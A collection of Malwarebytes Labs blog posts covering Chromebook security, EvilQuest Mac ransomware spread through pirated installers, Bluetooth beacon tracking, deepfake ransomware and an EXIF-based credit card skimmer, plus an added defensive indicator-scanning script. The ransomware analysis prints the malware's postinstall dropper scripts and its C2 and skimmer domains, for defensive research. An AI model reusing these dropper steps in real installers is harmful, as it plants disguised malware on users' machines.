Malware Bytes

Do Chromebooks need antivirus protection?

Malware Bytes Security - Wed, 07/01/2020 - 1:26pm

The supervisor handed Jim a Chromebook and said: “Take this home with you and use it to send me updates. We want to minimize the number of visits to the office—anything you can do from home helps keep this place safer. When the pandemic is over, I’d like to have it back in one piece, if possible.”

Jim is great at his job, but his reputation with technology skills is somewhat lacking. This should be an interesting experiment.

The Chromebook Jim’s supervisor hands him is a low-level laptop running ChromeOS. Because of the minimum hardware requirements for ChromeOS, these laptops are usually a lot cheaper than those running Windows or macOS. Bonus: Chromebooks are user-friendly, so folks with less technical savvy can still navigate with ease.

Not all jobs allow for working from home (WFH)—some have to visit clients or building sites. But for those who can, a Chromebook can be an ideal solution for employers to hand out. They are cheap, fast, and as long as you don’t need any complex or specific software to run on them, they can be used for any web-based and administrative tasks, such as reading and sending email, creating progress reports, and preparing information for the billing department.

Chromebook security

Chromebooks are supposed to come with sufficient, built-in security. But is that really true? Can you use a Chromebook without having to think twice about general cybersecurity and anti-malware protection in particular? Or do you need Chromebook antivirus? Let’s have a look first at which security features are pre-packed in ChromeOS.

The built-in security features of ChromeOS include:

  • Automatic updating: This is a good feature. No argument there. But it says nothing about the frequency of updates or about how fast updates will become available to counter zero-day vulnerabilities.
  • Sandboxing: Sandboxing is a method to limit the impact of an infection. The idea is that when you close an app or website, the related infection will be gone. While this might be true in most cases, it’s wishful thinking to believe malware authors would be unable to “escape” the sandbox.
  • Verified boot: This is a check done when the system starts up to verify that it hasn’t been tampered with. But this check does not work when the system is set to Developer Mode.
  • Encryption: This is an excellent feature that prevents criminals from retrieving data from a compromised, stolen or lost laptop, but it does not protect the system against malware.
  • Recovery: Recovery is an option that you can use to restore the Chromebook to a previous state. While this could get rid of malware, it might also delete important data in the process.

While Chromebooks have several built-in security features, none of them are foolproof. The danger is minimized by design, but any motivated cybercriminal could find their way around the checks put in place.

Additional Chromebook security risks

There are some additional arguments that could be made against using a Chromebook antivirus program. Chromebooks can download and run Android apps in emulated mode, which increases their security risk. But additional security protocols should prevent this feature from being exploited. These include the following:

  • The Play Store and Web Store both check the apps before they are admitted. While this may stop many blatant forms of malware, we find a fair amount of adware and potentially unwanted programs in these stores every day. And now and then, more malicious security threats make their way into the Play Store. And then there is the fact that many users will be tempted to install apps that are not available in the Play or Web Stores (yet).
  • Administrator permissions for malware are impossible to get on a Chromebook. While this is true, it does not mean that malware can’t get nasty without these permissions. As we have discussed in our blog on how Chromebooks can and do get infected, there are many examples of malware for Chromebooks that are annoying enough without the need to be elevated.
  • Chromebooks are not interesting for malware authors. Again, this may have been true at some point, but the more Chromebooks are out there, the bigger their target audience and the more appealing to focus on that group.

All in all, Chromebook virus protection may not be necessary yet, but there is plenty of malware going around that could ruin your Chromebook experience.

Beware of trusting the OS too much

As we have heard in the past (Macs don’t get infected!), some platforms have reputations for being safer even when the truth is the opposite. For example, this year, Mac malware outpaced Windows malware 2:1.

Windows machines still dominate the market share and tend to have more security vulnerabilities, which have for years made them the bigger and easier target for hackers. But as Apple’s computers have grown in popularity, hackers appear to be focusing more of their attention on the versions of macOS that power them. There is a good chance that with the growing popularity of ChromeOS-based systems, the same will happen in that field.

And the browser

And let’s not forget the weak spot of any OS: its browser. Just the other day, Google removed 106 extensions that were found spying on users. These extensions were all published by the same criminals and were found illegally collecting sensitive user data as part of a massive global surveillance campaign.

Awake Security, which disclosed the findings late last week, said the malicious browser add-ons were tied back to a single Internet domain registrar, GalComm.

This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.

Our advice is that the malware out there today is obtrusive enough to warrant installing extra protection on any device, including a Chromebook. As Chromebooks gain in popularity, cybercriminals will look to profit from them, too. Better to be safe and prepared than to be caught asleep at the laptop.

Stay safe, everyone!

The post Do Chromebooks need antivirus protection? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New Mac ransomware spreading through piracy

Malware Bytes Security - Tue, 06/30/2020 - 12:09pm

A Twitter user going by the handle @beatsballert messaged me yesterday after learning of an apparently malicious Little Snitch installer available for download on a Russian forum dedicated to sharing torrent links. A post offered a torrent download for Little Snitch, and was soon followed by a number of comments that the download included malware.

RUTracker post showing magnet link to malicious installer

Installation

Analysis of this installer showed that there was definitely something strange going on. To start, the legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed. However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.

Malicious Little Snitch installer

Examining this installer revealed that it would install what turned out to be the legitimate Little Snitch installer and uninstaller apps, as well as an executable file named “patch”, into the /Users/Shared/ directory.

Files installed

The installer also contained a postinstall script—a shell script that is executed after the installation process is completed. It is normal for this type of installer to contain preinstall and/or postinstall scripts, for preparation and cleanup, but in this case the script was used to load the malware and then launch the legitimate Little Snitch installer.

    #!/bin/sh
    mkdir /Library/LittleSnitchd
    mv /Users/Shared/Utils/patch /Library/LittleSnitchd/CrashReporter
    rmdir /Users/Shared/Utils
    chmod +x /Library/LittleSnitchd/CrashReporter
    /Library/LittleSnitchd/CrashReporter
    open /Users/Shared/ &

The script moves the patch file into a location that appears to be related to LittleSnitch and renames it to CrashReporter. As there is a legitimate process that is part of macOS named Crash Reporter, this name will blend in reasonably well if seen in Activity Monitor. It then removes itself from the /Users/Shared/ folder and launches the new copy. Finally, it launches the Little Snitch installer.

In practice, this didn’t work very well. The malware got installed, but the attempt to run the Little Snitch installer got hung up indefinitely, until I eventually forced it to quit. Further, the malware didn’t actually start encrypting anything, despite the fact that I let it run for a while with some decoy documents in position as willing victims.

While waiting for the malware to do something—anything!—further investigation turned up an additional malicious installer, for some DJ software called Mixed In Key 8, as well as hints that a malicious Ableton Live installer also exists (although such an installer has not yet been found). There are undoubtedly other installers floating around as well that have not been seen.

The Mixed In Key installer turned out to be quite similar, though with slightly different file names and postinstall script.

    #!/bin/sh
    mkdir /Library/mixednkey
    mv /Applications/Utils/patch /Library/mixednkey/toolroomd
    rmdir /Application/Utils
    chmod +x /Library/mixednkey/toolroomd
    /Library/mixednkey/toolroomd &

This one did not include code to launch a legitimate installer, and simply dropped the Mixed In Key app into the Applications folder directly.


Once the infection was triggered by the installer, the malware began spreading itself quite liberally around the hard drive. Both variants installed copies of the patch file at the following locations:

    /Library/AppQuest/
    /Users/user/Library/AppQuest/
    /private/var/root/Library/AppQuest/

It also set up persistence via launch agent and daemon plist files:

    /Library/LaunchDaemons/
    /Users/user/Library/LaunchAgents/
    /private/var/root/Library/LaunchAgents/

The latter in each group of files, found in /private/var/root/, is likely to be due to a bug in the code that creates the files in the user folder, leading to creation of the files in the root user’s folder. Since it’s quite rare for anyone to actually log in as root, this doesn’t serve any practical purpose.

Strangely, the malware also copied itself to the following files:

    /Users/user/Library/.ak5t3o0X2
    /private/var/root/Library/.5tAxR3H3Y

The latter was identical to the original patch file, but the former was modified in a very strange way. It contained a copy of the patch file, with a second copy of the data from that file appended to the end, followed by an additional 9 bytes: the hexadecimal string 03705701 00CEFAAD DE. It is not yet known what the purpose of these files or this additional appended data is.

Even more bizarre—and still inexplicable—was the fact that the malware also modified the following files:

    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler
    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateDaemon
    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics
    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch
    /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

These files are all executable files that are part of GoogleSoftwareUpdate, which are most commonly found installed due to having Google Chrome installed on the machine. These files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed. However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it’s unclear what the purpose here is.


The malware installed via the Mixed In Key installer was similarly reluctant to start encrypting files for me. I left it running on a real machine for some time with no results, then started playing with the system clock. After setting it ahead three days, disconnecting from the network, and restarting the computer a couple of times, it finally began encrypting files.

The malware wasn’t particularly smart about what files it encrypted, however. It appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in post-encryption.

Error displayed after the keychain was encrypted by the ransomware

There were other very obvious indications of error, such as the Dock resetting to its default appearance.

The Finder also began showing signs of trouble, with spinning beachballs frequently appearing when selecting an encrypted file. Other apps would also freeze periodically, but the Finder freezes could only be managed by force quitting the Finder.

Although others have reported that a file is created with instructions on paying the ransom, as well as an alert shown, and even text-to-speech used to inform the user they have been infected with ransomware, I was unable to duplicate any of these, despite waiting quite a while for the ransomware to finish.

Screenshot of encryption message posted to RUTracker forum

Capabilities

The malware includes some anti-analysis techniques, found in functions named is_debugging and is_virtual_mchn. This is common with malware, as having a debugger attached to the process or being run inside a virtual machine are both indications that a malware researcher is analyzing it. In such cases, malware will typically not display its full capabilities.

In a blog post on Objective-See, Patrick Wardle outlined the details of how these two routines work. The is_virtual_mchn function actually does not appear to check to see if the malware is running in a virtual machine, but rather tries to catch a VM in the process of adjusting time. It’s not unusual for malware to include delays. For example, the first ever Mac ransomware, KeRanger, included a three-day delay between when it infected the system and when it began encrypting files. This helps to disguise the source of the malware, as the malicious behavior may not be immediately associated with a program installed three days before.

This, plus the fact that the malware includes functions with names like ei_timer_create, ei_timer_start, and ei_timer_check, probably means that the malware runs on a time delay, although it’s not yet known what that delay is.

Patrick also points out that the malware appears to include a keylogger, due to the presence of calls to CGEventTapCreate, which is a system routine that allows for monitoring of events like keystrokes. What the malware does with this capability is not known. It also opens a reverse shell to a command and control (C2) server.

Open questions

There are still a number of open questions that will be answered through further analysis. For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?

There’s still more to be learned, and we will update this post as more becomes known.


If you get infected with this malware, you’ll want to get rid of it as quickly as possible! Malwarebytes for Mac will detect this malware as Ransom.OSX.EvilQuest and remove it.

If your files get encrypted, we’re not sure how dire a situation that is. It depends on the encryption and how the keys are handled. It’s possible that further research could lead to a method for decrypting files, and it’s also possible that won’t happen.

The best way of avoiding the consequences of ransomware is to maintain a good set of backups. Keep at least two backup copies of all important data, and at least one should not be kept attached to your Mac at all times. (Ransomware may try to encrypt or damage backups on connected drives.)

I personally have multiple hard drives for backups. I use Time Machine to maintain a couple, and Carbon Copy Cloner to maintain a couple more. One of the backups is always in the safe deposit box at the bank, and I swap them periodically, so that worst case scenario, I always have reasonably recent data stored in a safe location.

If you have good backups, ransomware is no threat to you. At worst, you can simply erase the hard drive and restore from a clean backup. Plus, those backups also protect you against things like drive failure, theft, destruction of your device, etc.

Indicators of Compromise

Files

    patch (and
    5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b

    Little Snitch 4.5.2.dmg
    f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa

    Mixed In Key 8.dmg
    b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a

Network

    C2 server: C2 address obtained from andrewka6.pythonanywhere[.]com
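A host triage script for the indicators described in this post, added here as an example and not Malwarebytes' or the malware's own code. It checks the drop directories (AppQuest, LittleSnitchd, mixednkey) under each Library folder, launch agent and daemon plists that point at them, hidden Library files with the doubled body plus 9-byte trailer, and the SHA-256 hashes from the IoC list; the root argument, the constructed sample tree and the plist name example.plist are assumptions, and because the post does not name the plist files, persistence is matched on a drop path appearing inside a plist.

```python
"""Triage for the EvilQuest indicators above (added example, not the post's code)."""
import hashlib
import tempfile
from pathlib import Path

KNOWN_HASHES = {  # SHA-256 values quoted in the post's IoC list
    "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b": "patch",
    "f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa": "Little Snitch 4.5.2.dmg",
    "b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a": "Mixed In Key 8.dmg",
}
DROP_DIR_NAMES = ("AppQuest", "LittleSnitchd", "mixednkey")  # created under a Library folder
PERSIST_DIR_NAMES = ("LaunchDaemons", "LaunchAgents")
PLIST_MARKERS = DROP_DIR_NAMES  # assumption: a plist pointing at a drop path is the persistence item
TRAILER = bytes.fromhex("0370570100CEFAADDE")  # the 9 bytes appended to the hidden copy


def library_dirs(root: Path) -> list:
    """Library folders the malware wrote into: /Library, each user's, and root's."""
    candidates = [root / "Library", root / "private" / "var" / "root" / "Library"]
    users = root / "Users"
    if users.is_dir():
        candidates += [h / "Library" for h in users.iterdir() if h.name != "Shared"]
    return [d for d in candidates if d.is_dir()]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def has_doubled_body_with_trailer(data: bytes) -> bool:
    """True for <body><same body><TRAILER>, the layout of the hidden ~/Library copy."""
    if len(data) <= len(TRAILER) or not data.endswith(TRAILER):
        return False
    body = data[:-len(TRAILER)]
    half, odd = divmod(len(body), 2)
    return half > 0 and odd == 0 and body[:half] == body[half:]


def scan(root) -> list:
    """Return (category, path, detail) tuples for every indicator found under root."""
    hits = []
    for lib in library_dirs(Path(root)):
        for name in DROP_DIR_NAMES:  # drop directories, plus hash check of their contents
            d = lib / name
            if d.is_dir():
                hits.append(("drop_dir", str(d), ""))
                for f in (p for p in d.rglob("*") if p.is_file()):
                    digest = sha256_of(f)
                    if digest in KNOWN_HASHES:
                        hits.append(("known_hash", str(f), KNOWN_HASHES[digest]))
        for f in lib.iterdir():  # hidden doubled copies such as .ak5t3o0X2
            if f.is_file() and f.name.startswith(".") and has_doubled_body_with_trailer(f.read_bytes()):
                hits.append(("doubled_copy", str(f), ""))
        for name in PERSIST_DIR_NAMES:  # launch agent / daemon plists referencing a drop path
            pd = lib / name
            for plist in (pd.glob("*.plist") if pd.is_dir() else ()):
                text = plist.read_text(errors="replace")
                if any(m in text for m in PLIST_MARKERS):
                    hits.append(("persistence", str(plist), "references drop path"))
    return hits


def build_sample_tree(base: Path) -> None:
    """Constructed sample tree mimicking the post's layout; file contents are fake."""
    patch = b"CONSTRUCTED-PATCH-BYTES"
    for lib in (base / "Library", base / "Users" / "user" / "Library"):
        (lib / "AppQuest").mkdir(parents=True)
        (lib / "AppQuest" / "patch").write_bytes(patch)
    (base / "Users" / "user" / "Library" / ".ak5t3o0X2").write_bytes(patch + patch + TRAILER)
    (base / "Library" / "LaunchDaemons").mkdir()
    (base / "Library" / "LaunchDaemons" / "example.plist").write_text(  # placeholder name
        "<plist><dict><key>ProgramArguments</key><array><string>/Library/AppQuest/patch"
        "</string></array></dict></plist>")
    (base / "Users" / "user" / "Library" / "LaunchAgents").mkdir()
    (base / "Users" / "user" / "Library" / "LaunchAgents" / "clean.plist").write_text(
        "<plist><dict><key>Program</key><string>/usr/bin/true</string></dict></plist>")


def demo() -> list:
    """Build the sample tree in a temporary directory and scan it."""
    base = Path(tempfile.mkdtemp())
    build_sample_tree(base)
    return scan(base)


if __name__ == "__main__":
    for category, path, detail in demo():
        print(f"{category:12} {path} {detail}")
```

Point scan() at "/" on a live Mac, or at the mount point of an image, to run it against real data; the known_hash category only fires for the exact files listed in the post.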


Bluetooth beacons: one free privacy debate with your next order

Malware Bytes Security - Tue, 06/30/2020 - 11:00am

Apps and their permissions have been in the news recently, particularly in relation to tracking/privacy issues and Bluetooth. Why Bluetooth, though? What is it, and what is it doing to raise concerns in some security quarters?

Bluetooth: your cool, then uncool, but mostly cool again cousin

Bluetooth has had a slightly odd reputation down the years. Pre-smart phones, for many people it was “that thing enabled by default, which you can also use to transfer photographs incredibly slowly.” When smart phones came around, it was relegated to “that thing enabled by default, but I’ll turn it off because I have Wi-Fi.”

Bluetooth technology actually has a lot of applications. It’s a short-range wireless communications protocol which doesn’t deserve its occasionally uncool reputation. Its limited range stops it from killing your battery, and from a security standpoint, it’s quite tricky to deliberately attack someone’s mobile device when everything hinges on a target being in a small space at a specific time.

If you want to send contacts or videos to someone, tether devices, talk to people safely while in a car, or even just fire up some wire-free headphones in the gym without hassle, Bluetooth is the place to be. That’s not to say people can’t do bad things with it, of course.

Apple’s AirDrop, which made use of Bluetooth, was caught up in some unsolicited message chaos back in 2018. Bluejacking did similar things and has been around for a long time. Bluetooth isn’t 100 percent secure, but then nothing is. There are multiple steps you can take to lock Bluetooth down, with the caveat that it works best by being open and accessible most of the time.

However, security concerns about Bluetooth are being raised today in the realm of beacon technology.

What is beacon technology?

I’m glad you asked. You likely run into beacons every day without knowing it. For clarity’s sake, there are many beacon types and we’re not focusing on all of them here. Web beacons, which typically track you across websites or email, are interesting but not our focus here. We’re exploring the kind of beacon located in a store you happen to enter, or even just pass by inside a mall, which sees you coming and helps to serve up (say) some targeted advertising on a billboard or helps ad networks push said ads when you get home in your web browser.

We’ll look at what happens once you step inside the store in a little while, but first we need to figure out how to get you to roll up to my wonderland emporium in the first place. The unexpected first step involves a fence, but not the wooden kind.

Putting up a fence

Geofencing has been around for a good while, and you may have come into contact with it without realizing what it’s called. If you’ve read a more recent “What is this technology?” article, you’ll probably see lots of mentions of advertising, marketing, leading offers, customer satisfaction, and more. You’d assume it was some sort of marketing be-all and end-all, created by Steven P. Advertising, CEO of geolocational advertising services.

That’s not quite the case. 

Geofencing allows you to carve out virtual space around a real area. It’ll help prevent toddlers escaping from a nursery, or stop people wearing an ankle bracelet going on the run. It could alert workers in dangerous environments that they’ve wandered into the danger zone, or help businesses keep curious employees or intruders out of secure areas.

As you’ll be aware, some of this has been around seemingly forever. However, marketing and sales have adopted it as a major method for driving sales. If you go searching online, most of the primary results will be for slick marketing operation dot com as opposed to oil rig platform safety dot net.

A trail of breadcrumbs

How do I let you know about my cool store if it’s quite a way off from your current location? I could throw up a chain of geofences along the roads you happen to be traveling down. As you pass through the geofenced area, you might start to receive mobile notifications about the awesome and very cheaply priced goods I’m selling.

Why not think bigger? I could geofence some digital billboards as you go driving past.

From your car, to my store: You may not have intended to pay me a visit when you set out this morning, but those adverts for…let’s say delicious sweet rolls…were too good an opportunity to pass up.

My selection of fences has brought you to the store, and now the in-house beacons will do the rest. Everything from your movement around the building to the products you linger on is now potentially up for grabs. But how do I send you some of those juicy beacon ads or follow you round the store like a digital ghost in the first place? How do I know if you’re lingering in front of my sweet rolls or walking on by to reach something more interesting?

The answer is: I need to introduce your mobile device to my good friend, Bluetooth McBeacon.

Bluetooth McBeacon: your new in-store guide

Well, what is a beacon? It’s most frequently a small, randomly shaped device. Could be a box, it might look like a router, or it could resemble one of those targets you strap to your chest in a game of laser tag. Put simply, it could be pretty much anything. It pulses out an ID and when a phone or other device recognises said ID, they’ll have a sales-based marketing conversation.

How to begin that sales-based marketing conversation?

The most common way for this to happen is to create an app, and include Bluetooth pairing as one of the permissions. If I’m strapped for cash or don’t know where to begin cobbling an app together, I don’t have to; there are multiple third-party apps out there which will pop your content via the beacon.

That’s the app part sorted out. My beacon device will make use of various protocols to howl its ID out into the void. Did you know Google made one of these protocols? How about Apple? It’s a whole new world of void howling.

Anyway, my beacon howls into the void at regular intervals—the shorter the better because it allows for more accurate tracking. When someone running the relevant mobile app wanders into the store, the beacon stops howling and starts hi-fiving as the mobile recognises the beacon ID. One quick permission request later, and we’re officially up and running with our previously mentioned sales-based marketing conversation.

The world is now our marketing oyster, and a barrage of targeted advertising, in-store offers, and even ads for objects you lingered in front of (but didn’t buy) will follow you home as a gentle reminder to maybe pick it up online at a discount. Depending on which ad platforms the beacon owner makes use of, they may be able to plug said platform directly into the beacon’s functionality, which would assist in even more detailed forms of tracking.

These techniques, combined with geofencing for maximum marketing impact, are how stores are pushing you to buy their stock and leading you to a marketing metrics bonanza behind the scenes.

There are many other forms of real-world ad pushing techniques, but in terms of Bluetooth and beacons, they’re a little more accessible and straightforward and this is probably why they’re so present in our everyday lives (even if we don’t realise it).

The future of Bluetooth tracking

Various attempts to make augmented reality shopping aids (dragging and dropping VR furniture into your room so you can see if it fits perfectly, waving your phone around to click on digital coupons as you pick up tins of soup, sales assistants knowing which product you hovered your phone over the longest) haven’t exactly exploded the way developers probably thought.

Nice ideas, but a little convoluted and often not practical. Dropping a router-like device in your store and asking people to download your app for some discounts instead? That is the way to go.

What can I do to avoid Bluetooth tracking?

Whether you’re not keen on election-related Bluetooth antics, or simply don’t want to be followed offline or otherwise by a growing collection of stores and malls, Bluetooth is easy to keep a handle on. Most phone models will have it as a default setting whenever you open your options menu, usually next to Wi-Fi. Don’t want Bluetooth doing its thing? Just turn it off.

If you desperately need to use Bluetooth for something specific, enable then disable right after. Keeping an eye on app permissions at install will help, and of course you should be in the habit of doing that anyway, and not just for Bluetooth. A huge range of apps ask for Bluetooth permissions, but that doesn’t necessarily mean they’re up to no good. As mentioned above, Bluetooth has a ton of valid uses, and even tech directly adjacent to it like ringfencing can be used for entirely useful purposes.

The trick is figuring out what the value proposition for the app is and knowing what its owners intend to do with your data once they have it. If you’re happy with their intentions, feel free to grant permission. If you’re unsure, save the install for another day and do some Internet sleuthing before making a commitment.

Because once your device and identity are plugged into an online/offline marketing profile, you may find it almost impossible to extract yourself. Perhaps it’s better to give that tempting-looking sweet roll store a pass.


A week in security (June 22 – 28)

Malware Bytes Security - Mon, 06/29/2020 - 12:25pm

Last week on Malwarebytes Labs, we provided a zero-day guide for 2020 featuring recent attacks and advanced preventive techniques, and we learned how to cough in the face of scammers, offering security tips for the 2020 tax season. We also looked at a web skimmer hiding within EXIF metadata that was exfiltrating credit cards via image files.

In the most recent episode of our podcast Lock and Code, we talked to Matt Davey and Kyle Swank of 1Password about strengthening and forgetting passwords.

Other cybersecurity news
  • Google removed 106 extensions from its Chrome Web Store for collecting sensitive user data as part of a campaign targeting oil and gas, finance, and healthcare sectors. (Source: The Hacker News)
  • DDoSecrets has published BlueLeaks, data from over 200 police departments, law enforcement training, and support resources and fusion centers. (Source: ThreatPost)
  • A sophisticated and well-crafted attack campaign has been hitting unprepared organizations with Nefilim – aka Nephilim – ransomware. (Source: Gov Info Security)
  • An IBM survey found that newly-minted remote workers actually present a significant cybersecurity risk, without being at fault. (Source: IBM Security)
  • Billing information for some clients that was stored in a browser’s cache may have been compromised, Twitter said in an email to business clients. (Source: SC Magazine UK)
  • A European bank suffered the biggest PPS DDoS attack to date, and a new botnet is suspected to be behind the attack. (Source: Bleeping Computer)
  • Researchers discovered a new variant of Lucifer—a hybrid cryptojacking malware—involved in numerous incidents of CVE-2019-9081 exploitation in the wild. (Source: Palo Alto Networks)
  • An online engineer warned people to stay away from Tik-Tok after close investigation revealed intrusive user tracking and other issues. (Source: BoredPanda)
  • Nvidia released a set of security updates to remove vulnerabilities in the Nvidia GPU Display Driver. (Source: ZDNet)
  • Sodinokibi ransomware operators that claimed to have siphoned confidential docs on Nicki Minaj, Mariah Carey, and Lebron James from an American law firm are threatening to auction off the info. (Source: The Register)

Stay safe, everyone!


The face of tomorrow’s cybercrime: Deepfake ransomware explained

Malware Bytes Security - Fri, 06/26/2020 - 1:24pm

While many countries are beginning to ease up on their respective pandemic lockdowns—which, in turn, also means that everyone will soon ease into a life that is not quite post-COVID-19—we find ourselves once more on the cusp of change, an outlook that makes some feel anxious and others hopeful.

But for forward-looking security experts, there are some futures they dread and, frankly, would rather un-see. This is because, in the underground market and forums, there is sustained interest in ransomware and the surprisingly cheap offerings of deepfake services to match every cyber miscreant’s campaign of choice. Mash them together and what do you have? Deepfake ransomware.

Cybercrime waiting to happen

News about ransomware continues to be relevant, especially for businesses, its consistent targets. It seems that organizations of all sizes cannot cope, especially now that perimeters have been essentially decimated by remote work. And if you have been paying attention about how cybercrime gangs operate, they don’t keep using the same malicious tools for long. Most of the time, these tools evolve in time and with the crime.

So can you imagine a world where deepfake ransomware is a thing?

“Deepfake ransomware”? Never heard of it.

Granted that this compound word is quite new, the two terms it’s made of are not. But for the sake of review, let’s look at each of these terms so we can get an idea of how they could be related and why they could present a frightening future in cybercrime.

Deepfakes are the manipulation of media, whether still images or videos accompanied by voice, using artificial intelligence (AI), resulting in a believable composite that is challenging to detect for the naked eye and/or software. We’ve touched on the topic of deepfakes in several of our articles here on the Labs blog, including the possibility of such technology being used in scam campaigns.

Ransomware, on the other hand, is malware that holds the victim’s files hostage, either by encrypting important files or locking victims out of certain computer features to prevent them from performing remediation steps, until a ransom is paid.

Combining these two suggests that deepfake tech can be used in ransomware campaigns or vice versa. This is feasible, albeit a bit of a mindbender. To help us understand the concept behind this weird intermarriage, several experts in the field have given us examples of how this concept might look in practice.

To the best of our knowledge, the term “deepfake ransomware” was first publicly coined by Paul Andrei Bricman, though he opted for a slightly different construction. A student at the University of Groningen specializing in AI and co-founder of the not-for-profit REAL (Registrul Educațional Alternativ), he went with the portmanteau “RansomFake” instead, declaring it “the lovechild of ransomware and deepfake.”

Bricman defined RansomFake as “a type of malicious software that automatically generates fake video, which shows the victim performing an incriminatory or intimate action and threatens to distribute it unless a ransom is paid.” Bricman goes on to suggest that the threat actor behind such a campaign would offer up their targets the option to permanently delete the video file after payment is received.

If something like this can be automated, you can bet that more bad actors with little to no background in programming will take interest in such a technology. In a recent report from Trend Micro, it is revealed that there is great interest in how deepfakes could be used for sextortion (or what they call “eWhoring”) or for bypassing authentication protocols that rely on image verification when using certain sites, such as dating sites.

This report also considers deepfake ransomware an emerging threat because it takes extortion-based ransomware to the next level. The scenario they presented is like Bricman’s: a threat actor scrapes videos and voice samples of their target from publicly available websites to create a deepfake video, while sprinkling in certain elements inspired by ransomware, such as a countdown timer that lasts for 24-48 hours.

Deepfake ransomware could also happen this way: A threat actor creates a deepfake video of their target, takes screenshots of this video and, pretending to be a legitimate contact of their target, sends them the screenshots and a link to the supposed video that they can watch themselves if they are in doubt.

Curious and perhaps half-convinced, half-scared, the target then clicks the link and gets redirected to the short clip of themselves in a compromising state, and all the while, ransomware is being downloaded onto their system. Or, the link may not lead to a purported video at all but to the auto-downloading and execution of a ransomware file. Remember that deepfakes can manipulate not just videos and voices but still images as well.

This is not an unlikely scenario. In fact, some ransomware threat actor(s) already used a similar tactic back in 2015.

Thankfully, this level of extortion hasn’t been seen in the wild (yet). Nonetheless, the potential for this campaign to destroy a target’s reputation is exceedingly high. It doesn’t really matter whether a video of someone is real or doctored to look real. As humans, we tend to believe what we see, because if you can’t trust your own eyes, what can you trust?

I’m not going to be a likely target, am I?

Never assume you’re not a target. Those who do—individuals, groups, and organizations alike—eventually find themselves at the receiving end of an attack. Worse—they’re not prepared for it. It’s always better to be safe now than sorry in the end.

Is there a way to protect against deepfake ransomware?

For this particular campaign, patching software for vulnerability holes is not needed—although you should be doing this religiously anyway.

A way to counter deepfake ransomware is at the beginning: Do not give cybercriminals the material they need to create something destructive and hold you responsible for. By this we mean watch what you post on social media in general: selfies, group pictures, TikTok videos, and other images are all up for grabs. You should think long and hard about who you’re sharing your content with and where.

Do an audit of your current photos and videos online and who has access to them. Weed out public-facing photos as much as you can or set them to be viewed by certain groups in your pool of contacts. If they’re not photos you posted yourself, simply un-tag yourself, or ask your contact to take them down.

Many call this process of “tidying up” data detoxing, and indeed, it is one of the handful of steps to keep your digital footprint as minimal as possible. This is not only good for your privacy but also for your pocket and sanity.

If you want to read more, Mozilla wrote about it not so long ago here.

When it comes to dealing with messages from people within your network, whether you personally know them or not, if you have means to reach them other than the social media platform, use them to verify two things: [a] Are they really the person you’re talking to?, and [b] If they are, did they actually send you those private messages about a purported video of you floating around the web that they found somewhere?

Furthermore, always be suspicious of links, especially those purportedly sent by someone you know. Here’s the thing: people are less likely to believe a stranger who is just “being nice” than someone they may know personally who is concerned about them. Cybercriminals know this, too. And they will do whatever they can to make you believe the scammery they’re attempting to pull on you.

Lastly, back up your files. Always.

The post The face of tomorrow’s cybercrime: Deepfake ransomware explained appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files

Malware Bytes Security - Thu, 06/25/2020 - 1:28pm

They say a picture is worth a thousand words. Threat actors must have remembered that as they devised yet another way to hide their credit card skimmer in order to evade detection.

When we first investigated this campaign, we thought it may be another one of those favicon tricks, which we had described in a previous blog. However, it turned out to be different and even more devious.

We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores. This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot.

During this research, we came across the source code for this skimmer which confirmed what we were seeing via client-side JavaScript. We also identified connections to other scripts based on various data points.

Skimmer hidden within EXIF metadata

The malicious code we detected was loaded from an online store running the WooCommerce plugin for WordPress. WooCommerce is increasingly being targeted by criminals, and for good reason, as it has a large market share.

Figure 1: Malwarebytes showing a web block on a merchant site

Malwarebytes was already blocking a malicious domain called cddn[.]site that was triggered upon visiting this merchant’s website. Upon closer inspection we found that extraneous code had been appended to a legitimate script hosted by the merchant.

The offending code loads a favicon file from cddn[.]site/favicon.ico which turns out to be the same favicon used by the compromised store (a logo of their brand). This is an artifact of skimming code that’s been observed publicly and that we refer to as Google loop.

Figure 2: Legitimate JavaScript library injected with additional code

However, nothing else so far from this code indicates any kind of web skimming activity. All we have is JavaScript that loads a remote favicon file and appears to parse some data as well.

